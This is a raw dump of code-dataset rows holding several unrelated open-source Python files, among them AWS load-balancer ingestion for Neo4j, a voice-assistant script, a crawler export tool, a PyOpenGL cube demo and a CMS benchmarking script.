hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
795c4f2aaa6dd09b023ba14a1aaf12c6886ff3d7 | 191 | py | Python | images/__init__.py | otrenav/dkt-street-analysis | e112d2f5c1092a7c39a71d137c35ba61745af41c | [
"Apache-2.0"
] | null | null | null | images/__init__.py | otrenav/dkt-street-analysis | e112d2f5c1092a7c39a71d137c35ba61745af41c | [
"Apache-2.0"
] | null | null | null | images/__init__.py | otrenav/dkt-street-analysis | e112d2f5c1092a7c39a71d137c35ba61745af41c | [
"Apache-2.0"
] | null | null | null | from shared import print_
def image_profiles(**kwargs):
print_("IMAGE PROFILES", title=True)
print_(kwargs)
raise NotImplementedError("image_profiles() is not yet implemented")
| 23.875 | 72 | 0.743455 |
795c4f4d9d1a1ed4220b87dd6f41160659c9ce94 | 8,610 | py | Python | cartography/intel/aws/ec2/load_balancer_v2s.py | kevin-j-smith/cartography | 23cfa9b88b626dc8a410d6a0363fa02410990c2e | [
"Apache-2.0"
] | null | null | null | cartography/intel/aws/ec2/load_balancer_v2s.py | kevin-j-smith/cartography | 23cfa9b88b626dc8a410d6a0363fa02410990c2e | [
"Apache-2.0"
] | null | null | null | cartography/intel/aws/ec2/load_balancer_v2s.py | kevin-j-smith/cartography | 23cfa9b88b626dc8a410d6a0363fa02410990c2e | [
"Apache-2.0"
] | null | null | null | import logging
from typing import Dict
from typing import List
import boto3
import botocore
import neo4j
from .util import get_botocore_config
from cartography.util import aws_handle_regions
from cartography.util import run_cleanup_job
from cartography.util import timeit
logger = logging.getLogger(__name__)
@timeit
@aws_handle_regions
def get_load_balancer_v2_listeners(client: botocore.client.BaseClient, load_balancer_arn: str) -> List[Dict]:
paginator = client.get_paginator('describe_listeners')
listeners: List[Dict] = []
for page in paginator.paginate(LoadBalancerArn=load_balancer_arn):
listeners.extend(page['Listeners'])
return listeners
@timeit
def get_load_balancer_v2_target_groups(client: botocore.client.BaseClient, load_balancer_arn: str) -> List[Dict]:
paginator = client.get_paginator('describe_target_groups')
target_groups: List[Dict] = []
for page in paginator.paginate(LoadBalancerArn=load_balancer_arn):
target_groups.extend(page['TargetGroups'])
# Add instance data
for target_group in target_groups:
target_group['Targets'] = []
target_health = client.describe_target_health(TargetGroupArn=target_group['TargetGroupArn'])
for target_health_description in target_health['TargetHealthDescriptions']:
target_group['Targets'].append(target_health_description['Target']['Id'])
return target_groups
@timeit
@aws_handle_regions
def get_loadbalancer_v2_data(boto3_session: boto3.Session, region: str) -> List[Dict]:
client = boto3_session.client('elbv2', region_name=region, config=get_botocore_config())
paginator = client.get_paginator('describe_load_balancers')
elbv2s: List[Dict] = []
for page in paginator.paginate():
elbv2s.extend(page['LoadBalancers'])
# Make extra calls to get listeners
for elbv2 in elbv2s:
elbv2['Listeners'] = get_load_balancer_v2_listeners(client, elbv2['LoadBalancerArn'])
elbv2['TargetGroups'] = get_load_balancer_v2_target_groups(client, elbv2['LoadBalancerArn'])
return elbv2s
@timeit
def load_load_balancer_v2s(
neo4j_session: neo4j.Session, data: List[Dict], region: str, current_aws_account_id: str,
update_tag: int,
) -> None:
ingest_load_balancer_v2 = """
MERGE (elbv2:LoadBalancerV2{id: $ID})
ON CREATE SET elbv2.firstseen = timestamp(), elbv2.createdtime = $CREATED_TIME
SET elbv2.lastupdated = $update_tag, elbv2.name = $NAME, elbv2.dnsname = $DNS_NAME,
elbv2.canonicalhostedzonenameid = $HOSTED_ZONE_NAME_ID,
elbv2.type = $ELBv2_TYPE,
elbv2.scheme = $SCHEME, elbv2.region = $Region
WITH elbv2
MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})
MERGE (aa)-[r:RESOURCE]->(elbv2)
ON CREATE SET r.firstseen = timestamp()
SET r.lastupdated = $update_tag
"""
for lb in data:
load_balancer_id = lb["DNSName"]
neo4j_session.run(
ingest_load_balancer_v2,
ID=load_balancer_id,
CREATED_TIME=str(lb["CreatedTime"]),
NAME=lb["LoadBalancerName"],
DNS_NAME=load_balancer_id,
HOSTED_ZONE_NAME_ID=lb.get("CanonicalHostedZoneNameID"),
ELBv2_TYPE=lb.get("Type"),
SCHEME=lb.get("Scheme"),
AWS_ACCOUNT_ID=current_aws_account_id,
Region=region,
update_tag=update_tag,
)
if lb["AvailabilityZones"]:
az = lb["AvailabilityZones"]
load_load_balancer_v2_subnets(neo4j_session, load_balancer_id, az, region, update_tag)
# NLB's don't have SecurityGroups, so check for one first.
if 'SecurityGroups' in lb and lb["SecurityGroups"]:
ingest_load_balancer_v2_security_group = """
MATCH (elbv2:LoadBalancerV2{id: $ID}),
(group:EC2SecurityGroup{groupid: $GROUP_ID})
MERGE (elbv2)-[r:MEMBER_OF_EC2_SECURITY_GROUP]->(group)
ON CREATE SET r.firstseen = timestamp()
SET r.lastupdated = $update_tag
"""
for group in lb["SecurityGroups"]:
neo4j_session.run(
ingest_load_balancer_v2_security_group,
ID=load_balancer_id,
GROUP_ID=str(group),
update_tag=update_tag,
)
if lb['Listeners']:
load_load_balancer_v2_listeners(neo4j_session, load_balancer_id, lb['Listeners'], update_tag)
if lb['TargetGroups']:
load_load_balancer_v2_target_groups(
neo4j_session, load_balancer_id, lb['TargetGroups'],
current_aws_account_id, update_tag,
)
if lb['TargetGroups']:
load_load_balancer_v2_target_groups(
neo4j_session, load_balancer_id, lb['TargetGroups'],
current_aws_account_id, update_tag,
)
@timeit
def load_load_balancer_v2_subnets(
neo4j_session: neo4j.Session, load_balancer_id: str, az_data: List[Dict],
region: str, update_tag: int,
) -> None:
ingest_load_balancer_subnet = """
MATCH (elbv2:LoadBalancerV2{id: $ID})
MERGE (subnet:EC2Subnet{subnetid: $SubnetId})
ON CREATE SET subnet.firstseen = timestamp()
SET subnet.region = $region, subnet.lastupdated = $update_tag
WITH elbv2, subnet
MERGE (elbv2)-[r:SUBNET]->(subnet)
ON CREATE SET r.firstseen = timestamp()
SET r.lastupdated = $update_tag
"""
for az in az_data:
neo4j_session.run(
ingest_load_balancer_subnet,
ID=load_balancer_id,
SubnetId=az['SubnetId'],
region=region,
update_tag=update_tag,
)
@timeit
def load_load_balancer_v2_target_groups(
neo4j_session: neo4j.Session, load_balancer_id: str, target_groups: List[Dict], current_aws_account_id: str,
update_tag: int,
) -> None:
ingest_instances = """
MATCH (elbv2:LoadBalancerV2{id: $ID}), (instance:EC2Instance{instanceid: $INSTANCE_ID})
MERGE (elbv2)-[r:EXPOSE]->(instance)
ON CREATE SET r.firstseen = timestamp()
SET r.lastupdated = $update_tag
WITH instance
MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})
MERGE (aa)-[r:RESOURCE]->(instance)
ON CREATE SET r.firstseen = timestamp()
SET r.lastupdated = $update_tag
"""
for target_group in target_groups:
if not target_group['TargetType'] == 'instance':
# Only working on EC2 Instances now. TODO: Add IP & Lambda EXPOSE.
continue
for instance in target_group["Targets"]:
neo4j_session.run(
ingest_instances,
ID=load_balancer_id,
INSTANCE_ID=instance,
AWS_ACCOUNT_ID=current_aws_account_id,
update_tag=update_tag,
)
@timeit
def load_load_balancer_v2_listeners(
neo4j_session: neo4j.Session, load_balancer_id: str, listener_data: List[Dict],
update_tag: int,
) -> None:
ingest_listener = """
MATCH (elbv2:LoadBalancerV2{id: $LoadBalancerId})
WITH elbv2
UNWIND $Listeners as data
MERGE (l:Endpoint:ELBV2Listener{id: data.ListenerArn})
ON CREATE SET l.port = data.Port, l.protocol = data.Protocol,
l.firstseen = timestamp(),
l.targetgrouparn = data.TargetGroupArn
SET l.lastupdated = $update_tag,
l.ssl_policy = data.SslPolicy
WITH l, elbv2
MERGE (elbv2)-[r:ELBV2_LISTENER]->(l)
ON CREATE SET r.firstseen = timestamp()
SET r.lastupdated = $update_tag
"""
neo4j_session.run(
ingest_listener,
LoadBalancerId=load_balancer_id,
Listeners=listener_data,
update_tag=update_tag,
)
@timeit
def cleanup_load_balancer_v2s(neo4j_session: neo4j.Session, common_job_parameters: Dict) -> None:
"""Delete elbv2's and dependent resources in the DB without the most recent lastupdated tag."""
run_cleanup_job('aws_ingest_load_balancers_v2_cleanup.json', neo4j_session, common_job_parameters)
@timeit
def sync_load_balancer_v2s(
neo4j_session: neo4j.Session, boto3_session: boto3.session.Session, regions: List[str], current_aws_account_id: str,
update_tag: int, common_job_parameters: Dict,
) -> None:
for region in regions:
logger.info("Syncing EC2 load balancers v2 for region '%s' in account '%s'.", region, current_aws_account_id)
data = get_loadbalancer_v2_data(boto3_session, region)
load_load_balancer_v2s(neo4j_session, data, region, current_aws_account_id, update_tag)
cleanup_load_balancer_v2s(neo4j_session, common_job_parameters)
| 36.794872 | 120 | 0.677236 |
795c503f2815baea93da6f4eec5140fa1b285588 | 1,025 | py | Python | __init__.py | satishnarasimhan/marina | 846067931f3bea6d8a686820bffdc5650891b176 | [
"MIT"
] | null | null | null | __init__.py | satishnarasimhan/marina | 846067931f3bea6d8a686820bffdc5650891b176 | [
"MIT"
] | null | null | null | __init__.py | satishnarasimhan/marina | 846067931f3bea6d8a686820bffdc5650891b176 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#!/usr/bin/env python3
import functions as f
import phrases as ph
# Initialization / Driver Code
if __name__ == "__main__":
f.speak("Hello there. This is Marina, your digital assistant. How can I be of help? What is your name?")
person = f.get_audio()
if person == 0:
person = 'there'
f.speak("Hello " + person + '.')
f.speak("What can i do for you?")
myname = "Marina"
wake = myname
while(1):
data = f.get_audio()
if data == 0:
continue
if "Marina" in str(data) or "hey Marina" in str(data) or data.count(wake) > 0:
f.speak("I'm listening . . Go ahead " + person)
if "exit" in str(data) or "Good bye" in str(data) or "sleep" in str(data) or "please stop" in str(data) :
if (person == 'there'):
f.speak("Ok. Bye for now")
else:
f.speak("Ok. Bye "+ person +'.')
break
ph.talkback(data,person)
| 25.625 | 109 | 0.527805 |
795c50408779bbc5c6365380cfa24f96405f9984 | 235 | py | Python | examples/ehireps/testing.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | 8 | 2021-06-21T18:58:56.000Z | 2021-12-13T09:47:41.000Z | examples/ehireps/testing.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | null | null | null | examples/ehireps/testing.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | 1 | 2021-06-29T04:42:45.000Z | 2021-06-29T04:42:45.000Z | from reps.ehireps import eHiREPS
from reps.envs import Himmelblau
ehireps = eHiREPS(func=Himmelblau(),
nb_components=5, nb_episodes=2500,
kl_bound=0.1)
trace = ehireps.run(nb_iter=10, verbose=True)
| 23.5 | 51 | 0.67234 |
795c50799d6f8009bbf14c4a25c81033682fce62 | 1,027 | py | Python | Bio/Align/Applications/__init__.py | amblina/biopython | 5045a7a3e86d5b32e0eaab941ab35daac86c59f8 | [
"PostgreSQL"
] | 1 | 2018-12-27T08:43:52.000Z | 2018-12-27T08:43:52.000Z | Bio/Align/Applications/__init__.py | amblina/biopython | 5045a7a3e86d5b32e0eaab941ab35daac86c59f8 | [
"PostgreSQL"
] | null | null | null | Bio/Align/Applications/__init__.py | amblina/biopython | 5045a7a3e86d5b32e0eaab941ab35daac86c59f8 | [
"PostgreSQL"
] | 1 | 2018-12-27T08:43:42.000Z | 2018-12-27T08:43:42.000Z | # Copyright 2009 by Peter Cock & Cymon J. Cox. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Alignment command line tool wrappers."""
from ._Muscle import MuscleCommandline
from ._Clustalw import ClustalwCommandline
from ._ClustalOmega import ClustalOmegaCommandline
from ._Prank import PrankCommandline
from ._Mafft import MafftCommandline
from ._Dialign import DialignCommandline
from ._Probcons import ProbconsCommandline
from ._TCoffee import TCoffeeCommandline
from ._MSAProbs import MSAProbsCommandline
# Make this explicit, then they show up in the API docs
__all__ = ["MuscleCommandline",
"ClustalwCommandline",
"ClustalOmegaCommandline",
"PrankCommandline",
"MafftCommandline",
"DialignCommandline",
"ProbconsCommandline",
"TCoffeeCommandline",
"MSAProbsCommandline",
]
| 36.678571 | 70 | 0.737098 |
795c508a32e6a55119a6144a8bcee344078b046e | 1,731 | py | Python | FourthDimViz/TwoDGL.py | Tellusionist/FourthDimViz | 6f33882fe122a7f6d10195be4d6c30c2ee68b7e6 | [
"MIT"
] | null | null | null | FourthDimViz/TwoDGL.py | Tellusionist/FourthDimViz | 6f33882fe122a7f6d10195be4d6c30c2ee68b7e6 | [
"MIT"
] | null | null | null | FourthDimViz/TwoDGL.py | Tellusionist/FourthDimViz | 6f33882fe122a7f6d10195be4d6c30c2ee68b7e6 | [
"MIT"
] | null | null | null | import pygame
from OpenGL.GL import glTranslatef, glRotatef, glClear, glBegin, glEnd, GL_LINES, glVertex3fv, GL_COLOR_BUFFER_BIT, GL_DEPTH_BUFFER_BIT
from OpenGL.GLU import gluPerspective
# setup 3D cube vertices
vertices= (
( 1, -1, -1 ),
( 1, 1, -1 ),
(-1, 1, -1 ),
(-1, -1, -1 ),
( 1, -1, 1 ),
( 1, 1, 1 ),
(-1, -1, 1 ),
(-1, 1, 1 )
)
# edges connecting each vertex
edges = (
( 0, 1 ),
( 0, 3 ),
( 0, 4 ),
( 2, 1 ),
( 2, 3 ),
( 2, 7 ),
( 6, 3 ),
( 6, 4 ),
( 6, 7 ),
( 5, 1 ),
( 5, 4 ),
( 5, 7 )
)
def Cube():
glBegin(GL_LINES)
for edge in edges:
for vertex in edge:
glVertex3fv(vertices[vertex])
glEnd()
def main():
pygame.init()
display = (800,600)
pygame.display.set_mode(display, pygame.DOUBLEBUF|pygame.OPENGL)
# perspective options: FOV, asepect ratio, znear, zfar
gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)
# move "us" back 5 units (so we can see the cube)
glTranslatef(0.0,0.0, -5)
# Run pygame, exit when clicking close window
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
# rotate by the rotation matrix, angle, x, y, and z
glRotatef(1, 3, 1, 1)
# clear the screen, I think?
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
# call the cube funciton we built earlier
Cube()
# update the pygame display and wait a bit
pygame.display.flip()
pygame.time.wait(1)
main() | 24.041667 | 135 | 0.510687 |
795c50ed8148173565af2c03ee7ac426ad83d76c | 1,009 | py | Python | ddosdb/website/urls.py | ddos-clearing-house/ddosdb | bf65d4649cd07d8b097b9dade59860465b0f3634 | [
"MIT"
] | 6 | 2019-05-22T11:15:48.000Z | 2021-10-02T06:06:53.000Z | ddosdb/website/urls.py | ddos-clearing-house/ddosdb | bf65d4649cd07d8b097b9dade59860465b0f3634 | [
"MIT"
] | 13 | 2019-02-25T11:12:22.000Z | 2022-01-08T18:16:25.000Z | ddosdb/website/urls.py | ddos-clearing-house/ddosdb | bf65d4649cd07d8b097b9dade59860465b0f3634 | [
"MIT"
] | 3 | 2020-09-10T10:14:37.000Z | 2022-01-18T19:23:38.000Z | """website URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
from django.conf import settings
from django.urls import include, path
urlpatterns = [
path('', include('ddosdb.urls')),
path('admin/', admin.site.urls),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
path('__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
| 32.548387 | 77 | 0.704658 |
795c514dc559235b001399bd197e82322c9589f0 | 5,475 | py | Python | export.py | sickpig/cashnodes | a7fd9d48a1507fa99182746663b98b39938219b9 | [
"MIT"
] | null | null | null | export.py | sickpig/cashnodes | a7fd9d48a1507fa99182746663b98b39938219b9 | [
"MIT"
] | null | null | null | export.py | sickpig/cashnodes | a7fd9d48a1507fa99182746663b98b39938219b9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# export.py - Exports enumerated data for reachable nodes into a JSON file.
#
# Copyright (c) Addy Yeow Chin Heng <ayeowch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Exports enumerated data for reachable nodes into a JSON file.
"""
import json
import logging
import os
import sys
import time
import re
from binascii import hexlify, unhexlify
from ConfigParser import ConfigParser
from utils import new_redis_conn
REDIS_CONN = None
CONF = {}
def get_row(node):
"""
Returns enumerated row data from Redis for the specified node.
"""
# address, port, version, user_agent, timestamp, services
node = eval(node)
uagent = node[3]
p = re.compile(CONF['exclude_uagent_string'])
if (p.search(uagent) is not None):
return ''
address = node[0]
port = node[1]
services = node[-1]
height = REDIS_CONN.get('height:{}-{}-{}'.format(address, port, services))
if height is None:
height = (0,)
else:
height = (int(height),)
hostname = REDIS_CONN.hget('resolve:{}'.format(address), 'hostname')
hostname = (hostname,)
geoip = REDIS_CONN.hget('resolve:{}'.format(address), 'geoip')
if geoip is None:
# city, country, latitude, longitude, timezone, asn, org
geoip = (None, None, 0.0, 0.0, None, None, None)
else:
geoip = eval(geoip)
return node + height + hostname + geoip
MAX_DUMPED_SNAPSHOTS = 500
def export_nodes(nodes, timestamp):
"""
Merges enumerated data for the specified nodes and exports them into
timestamp-prefixed JSON file.
"""
rows = []
start = time.time()
for node in nodes:
row = get_row(node)
if (row != ''):
rows.append(row)
end = time.time()
elapsed = end - start
logging.info("Elapsed: %d", elapsed)
dump = os.path.join(CONF['export_dir'], "{}.json".format(timestamp))
open(dump, 'w').write(json.dumps(rows, encoding="latin-1"))
REDIS_CONN.lpush('dumped_snapshots', timestamp)
REDIS_CONN.ltrim('dumped_snapshots', 0, MAX_DUMPED_SNAPSHOTS)
logging.info("Wrote %s", dump)
def init_conf(argv):
"""
Populates CONF with key-value pairs from configuration file.
"""
conf = ConfigParser()
conf.read(argv[1])
CONF['logfile'] = conf.get('export', 'logfile')
CONF['magic_number'] = unhexlify(conf.get('export', 'magic_number'))
CONF['db'] = conf.getint('export', 'db')
CONF['debug'] = conf.getboolean('export', 'debug')
CONF['export_dir'] = conf.get('export', 'export_dir')
CONF['exclude_uagent_string'] = conf.get('export', 'exclude_uagent_string')
if not os.path.exists(CONF['export_dir']):
os.makedirs(CONF['export_dir'])
def main(argv):
if len(argv) < 2 or not os.path.exists(argv[1]):
print("Usage: export.py [config]")
return 1
# Initialize global conf
init_conf(argv)
# Initialize logger
loglevel = logging.INFO
if CONF['debug']:
loglevel = logging.DEBUG
logformat = ("%(asctime)s,%(msecs)05.1f %(levelname)s (%(funcName)s) "
"%(message)s")
logging.basicConfig(level=loglevel,
format=logformat,
filename=CONF['logfile'],
filemode='w')
print("Log: {}, press CTRL+C to terminate..".format(CONF['logfile']))
global REDIS_CONN
REDIS_CONN = new_redis_conn(db=CONF['db'])
subscribe_key = 'resolve:{}'.format(hexlify(CONF['magic_number']))
publish_key = 'export:{}'.format(hexlify(CONF['magic_number']))
pubsub = REDIS_CONN.pubsub()
pubsub.subscribe(subscribe_key)
while True:
msg = pubsub.get_message()
if msg is None:
time.sleep(0.001) # 1 ms artificial intrinsic latency.
continue
# 'resolve' message is published by resolve.py after resolving hostname
# and GeoIP data for all reachable nodes.
if msg['channel'] == subscribe_key and msg['type'] == 'message':
timestamp = int(msg['data']) # From ping.py's 'snapshot' message
logging.info("Timestamp: %d", timestamp)
nodes = REDIS_CONN.smembers('opendata')
logging.info("Nodes: %d", len(nodes))
export_nodes(nodes, timestamp)
REDIS_CONN.publish(publish_key, timestamp)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| 32.205882 | 79 | 0.652785 |
795c51f8cff7e057b6c4872de079c179d61c4014 | 140 | py | Python | configs/pspnet/pspnet_r101-d8_480x480_80k_pascal_context_59.py | weiyx16/mmsegmentation | 6d35d76195f173fbc6b119a7d7815e67d78024c6 | [
"Apache-2.0"
] | 367 | 2022-01-14T03:32:25.000Z | 2022-03-31T04:48:20.000Z | configs/pspnet/pspnet_r101-d8_480x480_80k_pascal_context_59.py | weiyx16/mmsegmentation | 6d35d76195f173fbc6b119a7d7815e67d78024c6 | [
"Apache-2.0"
] | 27 | 2022-01-27T07:12:49.000Z | 2022-03-31T04:31:13.000Z | configs/pspnet/pspnet_r101-d8_480x480_80k_pascal_context_59.py | weiyx16/mmsegmentation | 6d35d76195f173fbc6b119a7d7815e67d78024c6 | [
"Apache-2.0"
] | 53 | 2022-01-18T11:21:43.000Z | 2022-03-31T06:42:41.000Z | _base_ = './pspnet_r50-d8_480x480_80k_pascal_context_59.py'
model = dict(pretrained='open-mmlab://resnet101_v1c', backbone=dict(depth=101))
| 46.666667 | 79 | 0.792857 |
795c523e43cc2c6f2a77898917a5173e9bbc2414 | 6,926 | py | Python | Validation/Performance/scripts/cmsBenchmark.py | trackerpro/cmssw | 3e05774a180a5f4cdc70b713bd711c23f9364765 | [
"Apache-2.0"
] | 1 | 2019-03-09T19:47:49.000Z | 2019-03-09T19:47:49.000Z | Validation/Performance/scripts/cmsBenchmark.py | trackerpro/cmssw | 3e05774a180a5f4cdc70b713bd711c23f9364765 | [
"Apache-2.0"
] | null | null | null | Validation/Performance/scripts/cmsBenchmark.py | trackerpro/cmssw | 3e05774a180a5f4cdc70b713bd711c23f9364765 | [
"Apache-2.0"
] | 1 | 2019-04-03T19:23:27.000Z | 2019-04-03T19:23:27.000Z | #!/usr/bin/env python
"""
Usage: ./cmsBenchmark.py [options]
Options:
--cpu=... specify the core on which to run the performance suite
--cores=... specify the number of cores of the machine (can be used with 0 to stop cmsScimark from running on the other cores)
-n ..., --numevts specify the number of events for each tests/each candle/each step
--candle=... specify the candle to run instead of all the 7 candles of the suite
--step=... specify the step to run instead of all steps of the suite
--repeat=... specify the number of times to re-run the whole suite
-h, --help show this help
-d show debugging information
Legal entries for individual candles (--candle option):
HiggsZZ4LM190
MinBias
SingleElectronE1000
SingleMuMinusPt10
SinglePiMinusE1000
TTbar
QCD_80_120
Legal entries for specific tests (--step option):
GEN
SIM
DIGI
L1
DIGI2RAW
HLT
RAW2DIGI
RECO
and combinations of steps like:
GEN-SIM
L1-DIGI2RAW-HLT
DIGI2RAW-RAW2DIGI
and sequences of steps or combinations of steps like:
GEN-SIM,DIGI,L1-DIGI2RAW-RAW2DIGI,RECO
Note: when the necessary pre-steps are omitted, cmsPerfSuite.py will take care of it.
Examples:
./cmsBenchmark.py
This will run with the default options --cpu=1, --cores=4, --numevts=100, --step=GEN-SIM,DIGI,RECO --repeat=1 (Note: all results will be reported in a directory called Run1).
OR
./cmsBenchmark.py --cpu=2
This will run the test on core cpu2.
OR
./cmsBenchmark.py --cpu=0,1 --cores=8 -n 200
This will run the suite with 200 events for all tests/candles/step, on cores cpu0 and cpu1 simulataneously, while running the cmsScimark benchmarks on the other 6 cores.
OR
./cmsBenchmark.py --cores=8 --repeat=10 --candle QCD_80_120
This will run the performance tests only on candle QCD_80_120, running 100 evts for all steps, and it will repeat these tests 10 times, saving the results in 10 separate directories (each called RunN, with N=1,..,10) to check for systematic/statistical uncertainties. Note that by default --repeat=1, so all results will be in a directory called Run1.
OR
./cmsBenchmark.py --step=GEN-SIM,DIGI,RECO
This will run the performance tests only for the steps "GEN,SIM" (at once), "DIGI" and "RECO" taking care of running the necessary intermediate steps to make sure all steps can be run.
"""
from __future__ import print_function
import os
#Get some environment variables to use
cmssw_base=os.environ["CMSSW_BASE"]
cmssw_release_base=os.environ["CMSSW_RELEASE_BASE"]
cmssw_version=os.environ["CMSSW_VERSION"]
host=os.environ["HOST"]
user=os.environ["USER"]
#Performance suites script used:
Script="cmsPerfSuite.py"
#Options handling
import getopt
import sys
def usage():
print(__doc__)
def main(argv):
#Some default values:
#Number of cpu cores on the machine
coresOption="4"
cores=" --cores=4"
#Cpu core(s) on which the suite is run:
cpuOption=(1) #not necessary to use tuple for single cpu, but for type consistency use ().
cpu=" --cpu=1"
#Number of events per test (per candle/per step):
numevtsOption="100"
numevts=" --timesize=100"
#default benchmark does not run igprof nor valgrind
igprofevts=" --igprof=0"
valgrindevts=" --valgrind=0"
#Default option for candle is "" since, usually all 7 candles of the suite will be run!
candleOption=""
candle=""
#Default option for step is ["GEN,SIM","DIGI","RECO"] since we don't need to profile all steps of the suite
stepOption="GEN-SIM,DIGI,RECO"
step=" --step="+stepOption
#Default option for repeat
repeatOption=1 #Use integer here since it will be used directly in the script
#Let's check the command line arguments
try:
opts, args = getopt.getopt(argv, "n:hd", ["cpu=","cores=","numevts=","candle=","step=","repeat=","help"])
except getopt.GetoptError:
print("This argument option is not accepted")
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt == '-d':
global _debug
_debug = 1
elif opt == "--cpu":
cpuOption=arg
cpus=cpuOption.split(",")
cpu=" --cpu="+cpuOption
elif opt == "--cores":
coresOption = arg
elif opt in ("-n", "--numevts"):
numevtsOption = arg
numevts=" --timesize="+arg
elif opt == "--candle":
candleOption = arg
candle=" --candle="+arg
elif opt == "--step":
stepOption = arg
steps=stepOption.split(",")
elif opt == "--repeat":
repeatOption = int(arg)
#Case with no arguments (using defaults)
if opts == []:
print("No arguments given, so DEFAULT test will be run:")
#Print a time stamp at the beginning:
import time
date=time.ctime()
path=os.path.abspath(".")
print("CMS Benchmarking started running at %s on %s in directory %s, run by user %s" % (date,host,path,user))
#showtags=os.popen4("showtags -r")[1].read()
#print showtags
#For the log:
print("This machine (%s) is assumed to have %s cores, and the suite will be run on cpu(s) %s" %(host,coresOption,cpuOption))
print("%s events per test will be run" % numevtsOption)
if candleOption !="":
print("Running only %s candle, instead of all the candles in the performance suite" % candleOption)
if stepOption != "":
print("Profiling only the following steps: %s" % stepOption)
step=" --step="+stepOption
#This "unpacking" of the steps is better done in cmsPerfSuite.py or the cmsSimPyRelVal.py (.pl for now)
#steps=stepOption.split(",")
#cmsPerfSuiteSteps=[]
#for step in steps:
# newstep=reduce(lambda a,b:a+","+b,step.split("-"))
# cmsPerfSuiteSteps.append(newstep)
if repeatOption !=1:
print("The benchmarking will be repeated %s times" % repeatOption)
#Now let's play!
for repetition in range(repeatOption):
mkdircdcmd="mkdir Run"+str(repetition+1)+";cd Run"+str(repetition+1)
#mkdircdstdout=os.popen4(mkdircmd)[1].read()
#if mkdirstdout:
# print mkdirstdout,
#print "Here we'd launch cmsPerfSuite.py!"
PerfSuitecmd="cmsPerfSuite.py" + cpu + cores + numevts + igprofevts + valgrindevts + candle + step + ">& cmsPerfSuiteRun" + str(repetition + 1) + ".log"
launchcmd=mkdircdcmd+";"+PerfSuitecmd
print(launchcmd)
sys.stdout.flush()
#Obsolete popen4-> subprocess.Popen
#launchcmdstdout=os.popen4(launchcmd)[1].read()
launchcmdstdout=Popen(launchcmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.read()
print(launchcmdstdout)
if __name__ == "__main__":
main(sys.argv[1:])
| 39.804598 | 356 | 0.657956 |
795c5353f5fb88ed8be964d8a4cdba5d5a7df434 | 4,321 | py | Python | app/views/dashboard/leadership/index.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
